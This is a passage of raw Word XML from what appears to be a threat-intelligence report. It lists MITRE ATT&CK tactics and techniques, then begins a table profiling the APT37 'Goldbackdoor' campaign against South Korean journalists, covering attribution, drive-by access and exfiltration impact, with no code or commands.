          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1055 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD59F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D8CBC8"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T1036.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Invalid Code Signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430E77A5"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1555.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D10D36E"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T1555.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Credentials from Password Stores&gt;:Credentials from Web Browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298BD850"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1120', 'T1057', 'T1033', 'T1082']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F63520"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1120 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Peripheral Device Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2460F214"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1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3633C102"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1033 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Owner/User Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A803819"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1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F51723"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C855D87"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1123', 'T1005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361C647"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1123 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Audio Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09008184"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r w:rsidRPr="00322435">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00322435">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00322435">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737551D5"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1071.001', 'T1102.002', 'T1105']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D15103"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T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571DCB03"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0D29F5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1102.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D29F5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0213B9" w14:textId="77777777" w:rsidR="007234CB" w:rsidRPr="00485C4E" w:rsidRDefault="007234CB" w:rsidP="007F6CC0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00485C4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00485C4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00485C4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB6DAF"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086BA560" w14:textId="77777777" w:rsidR="007234CB" w:rsidRPr="007234CB" w:rsidRDefault="007234CB" w:rsidP="007F6CC0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact ['T1529', 'T1561.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B3FC57"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lastRenderedPageBreak/>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1529 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Shutdown/Reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E44C61" w14:textId="77777777" w:rsidR="007234CB" w:rsidRPr="007234CB" w:rsidRDefault="007234CB" w:rsidP="007F6CC0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1561.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007234CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Disk Wipe&gt;:Disk Structure Wipe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412E8244" w14:textId="057A77AA" w:rsidR="005F312C" w:rsidRDefault="001F1F4C" w:rsidP="005F312C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc153480868"/>
      <w:r>
        <w:t>T1189</w:t>
      </w:r>
      <w:r w:rsidR="005F312C">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00603F4B" w:rsidRPr="00603F4B">
        <w:t xml:space="preserve">Nation-state Hackers Target Journalists with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00603F4B" w:rsidRPr="00603F4B">
        <w:t>Goldbackdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00603F4B" w:rsidRPr="00603F4B">
        <w:t xml:space="preserve"> Malware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="30484A17" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="005F312C">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5F312C" w:rsidRPr="002D1D50" w14:paraId="6846727B" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="604F1099" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="77" w:name="OLE_LINK13"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="543C98EB" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="002D1D50" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33C35952" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="00387DCC" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F312C" w:rsidRPr="00B857D7" w14:paraId="798374C0" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71A2D4C3" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EC93541" w14:textId="593039E0" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="580CAE31" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="00387DCC" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F312C" w:rsidRPr="00B857D7" w14:paraId="50088B0D" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4322D99E" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="007328DE" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B036395" w14:textId="086EC4E5" w:rsidR="005F312C" w:rsidRPr="007328DE" w:rsidRDefault="00FC4A79" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC4A79">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FC4A79">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1189 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FC4A79">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Drive-by Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C101529" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="00387DCC" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F312C" w:rsidRPr="00B857D7" w14:paraId="3FBE0949" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72CB64A9" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FE199A8" w14:textId="1A5070A6" w:rsidR="005F312C" w:rsidRPr="007328DE" w:rsidRDefault="00A80185" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>North Korea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CD0C263" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="00387DCC" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F312C" w:rsidRPr="00B857D7" w14:paraId="617C139A" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78770DA2" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A52F112" w14:textId="014A7EE9" w:rsidR="005F312C" w:rsidRDefault="005D3A54" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>South Korea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AF704B3" w14:textId="77777777" w:rsidR="005F312C" w:rsidRPr="00387DCC" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F312C" w:rsidRPr="00B857D7" w14:paraId="6D6F8DA0" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7008ED35" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21810A89" w14:textId="3D0B8D01" w:rsidR="005F312C" w:rsidRDefault="002D18C6" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Journalist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E7DDC0B" w14:textId="4665CB7E" w:rsidR="005F312C" w:rsidRPr="00387DCC" w:rsidRDefault="002D18C6" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidRPr="002D18C6">
              <w:t xml:space="preserve">Sophisticated hackers believed to be tied to the North Korean government are actively targeting journalists with novel malware dubbed </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002D18C6">
              <w:t>Goldbackdoor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F312C" w:rsidRPr="00B857D7" w14:paraId="64ABC811" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B99283C" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DA98266" w14:textId="13C24BEF" w:rsidR="005F312C" w:rsidRDefault="00F14862" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AFC85F5" w14:textId="40181060" w:rsidR="005F312C" w:rsidRDefault="00F14862" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidR="00811AE1" w:rsidRPr="00811AE1">
              <w:t>Attacks have consisted of multistage infection campaign with the ultimate goal of stealing sensitive information from targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F312C" w:rsidRPr="00B857D7" w14:paraId="7764311B" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D2719A1" w14:textId="77777777" w:rsidR="005F312C" w:rsidRDefault="005F312C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
